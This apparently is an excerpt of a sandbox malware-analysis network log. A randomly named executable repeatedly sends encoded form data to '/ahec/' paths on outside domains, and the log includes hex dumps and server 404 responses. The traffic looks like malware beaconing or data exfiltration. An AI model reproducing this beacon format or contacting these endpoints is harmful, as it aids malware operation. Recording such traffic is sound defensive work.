                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.thecoloringbitch.com
                                                                          Origin: http://www.thecoloringbitch.com
                                                                          Referer: http://www.thecoloringbitch.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 71 44 64 4b 75 39 30 73 72 47 53 47 69 50 32 2f 43 45 5a 2f 62 71 54 50 4c 2b 30 34 71 56 4b 73 54 68 4b 4b 63 73 56 34 63 4a 79 6b 49 50 43 72 5a 30 6c 76 38 36 4c 33 42 73 76 76 50 73 56 7a 64 61 75 37 4c 57 68 59 6d 50 63 53 78 44 46 79 6a 5a 77 69 55 6f 43 75 58 75 6d 67 44 30 44 4b 6d 6e 7a 64 55 33 30 69 52 68 7a 64 77 61 76 70 73 2f 66 75 67 6b 6e 74 71 67 32 65 4a 2f 31 6f 61 30 6d 6e 6d 49 49 50 68 4a 74 64 4c 36 47 31 4a 6b 56 51 6d 6c 55 45 53 69 66 52 57 46 6d 70 48 5a 53 30 6a 5a 71 7a 43 33 59 39 48 6a 59 6a 32 51 3d 3d
                                                                          Data Ascii: KHcH=qDdKu90srGSGiP2/CEZ/bqTPL+04qVKsThKKcsV4cJykIPCrZ0lv86L3BsvvPsVzdau7LWhYmPcSxDFyjZwiUoCuXumgD0DKmnzdU30iRhzdwavps/fugkntqg2eJ/1oa0mnmIIPhJtdL6G1JkVQmlUESifRWFmpHZS0jZqzC3Y9HjYj2Q==
                                                                          Dec 2, 2023 18:50:24.491022110 CET533INHTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:50:24 GMT
                                                                          Server: Apache
                                                                          Content-Length: 315
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          38192.168.2.549757162.241.252.161801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:50:27.010592937 CET832OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.thecoloringbitch.com
                                                                          Origin: http://www.thecoloringbitch.com
                                                                          Referer: http://www.thecoloringbitch.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 71 44 64 4b 75 39 30 73 72 47 53 47 6b 75 47 2f 45 6e 78 2f 53 71 54 4d 56 75 30 34 67 31 4b 6f 54 68 47 4b 63 75 35 53 64 38 69 6b 49 75 53 72 59 78 52 76 2f 36 4c 33 55 63 76 51 4c 73 55 2f 64 61 7a 49 4c 55 31 59 6d 4c 30 53 78 47 70 79 6b 75 63 74 58 59 43 6f 61 4f 6d 6d 48 30 44 4b 6d 6e 7a 64 55 33 67 45 52 67 62 64 78 71 2f 70 73 64 33 70 38 55 6e 79 67 41 32 65 59 50 31 73 61 30 6e 58 6d 4d 41 68 68 50 68 64 4c 37 32 31 4a 78 35 54 73 6c 55 47 57 69 65 47 54 30 32 6d 50 49 61 66 6f 38 2b 7a 61 6e 56 4e 47 32 30 77 78 70 4e 61 35 63 6c 68 2b 33 6a 49 6f 2f 67 4c 44 54 48 6b 66 49 77 3d
                                                                          Data Ascii: KHcH=qDdKu90srGSGkuG/Enx/SqTMVu04g1KoThGKcu5Sd8ikIuSrYxRv/6L3UcvQLsU/dazILU1YmL0SxGpykuctXYCoaOmmH0DKmnzdU3gERgbdxq/psd3p8UnygA2eYP1sa0nXmMAhhPhdL721Jx5TslUGWieGT02mPIafo8+zanVNG20wxpNa5clh+3jIo/gLDTHkfIw=
                                                                          Dec 2, 2023 18:50:27.211474895 CET533INHTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:50:27 GMT
                                                                          Server: Apache
                                                                          Content-Length: 315
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          39192.168.2.549758162.241.252.161801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:50:29.727535963 CET1845OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.thecoloringbitch.com
                                                                          Origin: http://www.thecoloringbitch.com
                                                                          Referer: http://www.thecoloringbitch.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 71 44 64 4b 75 39 30 73 72 47 53 47 6b 75 47 2f 45 6e 78 2f 53 71 54 4d 56 75 30 34 67 31 4b 6f 54 68 47 4b 63 75 35 53 64 38 71 6b 4c 5a 53 72 58 79 4a 76 2b 36 4c 33 56 63 76 56 4c 73 56 6c 64 61 72 45 4c 55 6f 6a 6d 4e 77 53 33 67 39 79 68 63 6b 74 4d 49 43 6f 54 75 6d 6a 44 30 43 58 6d 6e 6a 5a 55 33 77 45 52 67 62 64 78 6f 58 70 38 66 66 70 76 45 6e 74 71 67 32 73 4a 2f 31 45 61 30 2b 76 6d 4d 4d 66 68 2f 42 64 4b 62 6d 31 4b 44 42 54 78 31 55 59 59 43 65 4f 54 30 37 6d 50 49 47 35 6f 38 6a 57 61 6b 46 4e 44 43 39 59 73 4c 64 4f 6e 36 6c 46 31 56 6e 53 34 49 51 46 65 69 65 68 64 75 42 50 31 6a 66 7a 4b 51 46 32 4f 33 4d 46 65 38 51 76 45 4f 4f 37 58 75 59 6a 74 56 6f 34 42 41 34 30 5a 57 76 49 55 49 74 67 4d 45 32 69 73 70 30 6a 4b 47 32 64 6a 53 53 30 64 77 54 38 45 4a 54 51 33 78 4e 2f 77 52 4c 74 31 6b 34 55 7a 33 37 6a 4c 4f 77 79 66 72 35 48 56 50 6f 73 35 6b 4a 7a 68 69 75 4a 5a 68 76 57 4a 66 74 7a 6e 34 74 2b 67 67 47 50 7a 33 74 55 58 33 31 64 31 30 4a 6e 55 6f 55 58 73 4d 6c 77 45 73 65 32 71 69 55 68 49 4e 6e 64 5a 6b 49 6b 61 5a 74 36 6e 63 34 30 6f 7a 46 7a 50 4d 74 31 31 62 36 63 76 58 4a 4b 64 6c 47 68 39 31 4c 53 6f 45 74 59 55 5a 71 47 39 2b 78 43 52 72 5a 4e 75 63 69 62 35 31 44 69 32 6a 6e 78 43 59 59 4f 78 53 51 46 44 65 4c 4f 41 46 6c 47 53 62 66 38 6a 2b 35 70 73 36 67 51 64 6a 52 37 71 5a 65 4a 36 58 70 31 48 6f 6a 5a 70 35 75 62 75 69 44 4d 79 52 39 6e 61 74 2f 46 59 4c 62 4c 4e 76 75 7a 32 7a 64 78 52 52 47 59 73 6c 56 48 43 34 75 59 53 37 4a 42 33 35 56 48 74 47 75 67 42 36 70 49 37 30 72 75 55 5a 44 61 73 74 31 51 37 47 38 5a 43 34 6b 49 44 5a 36 39 2f 52 32 65 79 67 65 35 48 45 78 43 55 50 63 33 4e 4f 43 78 35 58 6d 64 49 41 73 50 67 38 56 51 4f 59 4f 78 75 63 64 42 34 50 6d 72 54 30 62 6b 7a 57 47 68 4e 4b 69 78 65 66 64 6d 68 2f 63 4a 47 36 57 32 64 4c 5a 6e 59 65 4a 61 56 4d 68 4b 70 47 64 55 46 61 30 70 5a 74 35 4a 33 4f 39 52 4d 68 6d 57 67 5a 6c 44 50 56 53 54 33 32 4f 2f 70 34 56 36 76 56 75 71 47 48 70 57 6e 64 37 79 41 4c 59 46 49 51 49 47 51 59 56 6b 41 44 2b 75 68 4c 47 66 4d 43 6b 77 45 37 65 76 58 59 53 72 45 6a 46 70 38 51 59 45 2f 46 4a 53 36 36 46 71 75 41 33 58 4a 6f 6e 4f 51 38 61 71 50 79 4f 55 4b 6f 4c 6e 66 79 34 76 33 79 37 6f 67 52 38 53 53 52 72 34 52 55 63 36 49 6c 61 4b 6c 6b 72 4d 38 55 67 31 52 6c 71 4a 76 68 36 30 59 62 43 65 48 32 53 39 31 54 66 69 2f 54 44 56 63 45 6f 6b 7a 56 32 72 4c 77 69 77 30 39 50 4f 4a 52 55 39 49 78 44 59 6c 53 77 69 39 61 57 61 6b 4e 39 74 45 72 36 4b 65 6b 50 71 56 6a 78 37 50 68 53 61 66 61 4f 34 2b 38 39 67 62 51 36 43 66 77 38 35 49 37 62 74 44 52 45 42 57 72 42 52 58 61 6e 39 65 66 6b 36 42 79 44 4b 32 79 4d 6e 4f 45 70 64 32 4f 4e 75 6b 4c 6e 72 2f 68 6f 6f 70 44 49 75 7a 41 39 38 6b 64 50 31 68 71 39 59 54 75 4a 77 77 37 41 37 63 75 36 49 6d 55 4c 6b 46 49 55 6b 59 73 4d 66 6a 52 35 57 51 50 79 34 32 55 38 72 77 53 72 59 45 7a 62 37 63 6e 59 67 54 48 36 50 71 70 64 70 74 6e 55 32 37 79 37 31 2b 30 67 44 4b 6b 59 78 76 53 46 62 2b 55 6e 56 59 79 37 79 6d 2f 30 4c 44 30 37 35 44 46 58 59 50 4c 45 6f 41 64 2b 4a 2f 4b 49 4f 72 44 44 64 2b 4e 6f 44 72 70 35 2f 63 4e 4c 74 54 6c 55 62 67 36 4d 54 38 32 76 4a 65 30 54 52 4d 37 36 4f 54 30 69 6d 68 50 37 73 43 4f 34 30 42 45 2f 38 50 65 53 47 45 48 63 47 54 59 30 4e 4f 53 7a 75 47 73 6e 4c 79 6e 6c 68 74 49 64 46 78 46 4b 6c 58 36 79 69 32 4a 2f 4f 6a 58 76 4d 6a 38 71 65 55 55 46 47 65 6d 47 77 53 45 38 58 58 71 6f 6a 35 63 6e 74 50 6c 48 7a 72 77 31 31 36 47 77 6f 72 73 37 4b 61 6a 34 6c 6b 79 74 70 50 70 44 73 61 42 41 4e 52 4f 68 6e 36 64 68 50 59 50 67 6f 35 70 65 50 4f 70 4b 43 56 54 4f 66 36 56 62 4b 74 54 42 6f 43 53 4e 50
                                                                          Data Ascii: KHcH=qDdKu90srGSGkuG/Enx/SqTMVu04g1KoThGKcu5Sd8qkLZSrXyJv+6L3VcvVLsVldarELUojmNwS3g9yhcktMICoTumjD0CXmnjZU3wERgbdxoXp8ffpvEntqg2sJ/1Ea0+vmMMfh/BdKbm1KDBTx1UYYCeOT07mPIG5o8jWakFNDC9YsLdOn6lF1VnS4IQFeiehduBP1jfzKQF2O3MFe8QvEOO7XuYjtVo4BA40ZWvIUItgME2isp0jKG2djSS0dwT8EJTQ3xN/wRLt1k4Uz37jLOwyfr5HVPos5kJzhiuJZhvWJftzn4t+ggGPz3tUX31d10JnUoUXsMlwEse2qiUhINndZkIkaZt6nc40ozFzPMt11b6cvXJKdlGh91LSoEtYUZqG9+xCRrZNucib51Di2jnxCYYOxSQFDeLOAFlGSbf8j+5ps6gQdjR7qZeJ6Xp1HojZp5ubuiDMyR9nat/FYLbLNvuz2zdxRRGYslVHC4uYS7JB35VHtGugB6pI70ruUZDast1Q7G8ZC4kIDZ69/R2eyge5HExCUPc3NOCx5XmdIAsPg8VQOYOxucdB4PmrT0bkzWGhNKixefdmh/cJG6W2dLZnYeJaVMhKpGdUFa0pZt5J3O9RMhmWgZlDPVST32O/p4V6vVuqGHpWnd7yALYFIQIGQYVkAD+uhLGfMCkwE7evXYSrEjFp8QYE/FJS66FquA3XJonOQ8aqPyOUKoLnfy4v3y7ogR8SSRr4RUc6IlaKlkrM8Ug1RlqJvh60YbCeH2S91Tfi/TDVcEokzV2rLwiw09POJRU9IxDYlSwi9aWakN9tEr6KekPqVjx7PhSafaO4+89gbQ6Cfw85I7btDREBWrBRXan9efk6ByDK2yMnOEpd2ONukLnr/hoopDIuzA98kdP1hq9YTuJww7A7cu6ImULkFIUkYsMfjR5WQPy42U8rwSrYEzb7cnYgTH6PqpdptnU27y71+0gDKkYxvSFb+UnVYy7ym/0LD075DFXYPLEoAd+J/KIOrDDd+NoDrp5/cNLtTlUbg6MT82vJe0TRM76OT0imhP7sCO40BE/8PeSGEHcGTY0NOSzuGsnLynlhtIdFxFKlX6yi2J/OjXvMj8qeUUFGemGwSE8XXqoj5cntPlHzrw116Gwors7Kaj4lkytpPpDsaBANROhn6dhPYPgo5pePOpKCVTOf6VbKtTBoCSNP
                                                                          Dec 2, 2023 18:50:29.926692009 CET533INHTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:50:29 GMT
                                                                          Server: Apache
                                                                          Content-Length: 315
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          40192.168.2.549759162.241.252.161801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:50:33.175403118 CET524OUTGET /ahec/?Vjk=-N-tntX&KHcH=nB1qtJANgieev8TNIXcafe3NbPYBnXyCXRyPWsB/WMzSWoyZdSlu5bXncPzzIIBEZ/2nP35zxbYs3CtalsMWA76IWuP2FlzTnw== HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.thecoloringbitch.com
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:50:33.390032053 CET533INHTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:50:33 GMT
                                                                          Server: Apache
                                                                          Content-Length: 315
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          41192.168.2.549760185.74.252.11801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:50:39.220145941 CET794OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.altralogos.com
                                                                          Origin: http://www.altralogos.com
                                                                          Referer: http://www.altralogos.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 36 6e 41 59 31 70 77 4a 75 72 46 33 6d 5a 56 74 71 68 6f 6a 63 53 2f 70 46 51 4e 64 2b 65 70 6a 5a 5a 77 67 4e 41 36 6c 57 77 45 6d 6d 32 4c 39 4d 44 46 6a 73 4a 33 57 4f 6f 6e 54 6c 41 47 38 51 64 52 4e 53 47 2b 6e 38 30 4f 31 4c 58 69 66 38 77 79 51 51 4b 54 76 4b 4e 57 76 57 58 39 59 61 71 58 4c 6b 37 55 77 6a 4c 62 66 6c 67 6b 39 37 51 36 38 64 35 45 38 4c 6c 33 34 46 46 46 51 68 76 64 49 30 72 4b 5a 76 6c 51 6c 58 4f 5a 4d 37 48 58 36 70 72 35 51 61 71 76 41 61 44 6d 76 37 46 50 6f 70 52 49 31 31 4b 72 6c 72 76 47 66 58 51 3d 3d
                                                                          Data Ascii: KHcH=6nAY1pwJurF3mZVtqhojcS/pFQNd+epjZZwgNA6lWwEmm2L9MDFjsJ3WOonTlAG8QdRNSG+n80O1LXif8wyQQKTvKNWvWX9YaqXLk7UwjLbflgk97Q68d5E8Ll34FFFQhvdI0rKZvlQlXOZM7HX6pr5QaqvAaDmv7FPopRI11KrlrvGfXQ==
                                                                          Dec 2, 2023 18:50:40.391369104 CET1340INHTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:50:38 GMT
                                                                          Server: Apache
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                          Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Transfer-Encoding: chunked
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4d 53 49 6e 70 75 74 4d 65 74 68 6f 64 43 6f 6e 74 65 78 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 6a 73 2f 6c 69 62 73 2f 69 65 31 31 43 75 73 74 6f 6d 50 72 6f 70 65 72 74 69 65 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 5c 2f 73 63 72 69 70 74 3e 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 50 72 65 6d 69 75 6d 20 70 6c 75 67 69 6e 20 76 31 39 2e 32 2e 31 20 28 59 6f 61 73 74 20 53 45 4f 20 76 31 39 2e 36 2e 31 29 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 75 5f 52 55 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22
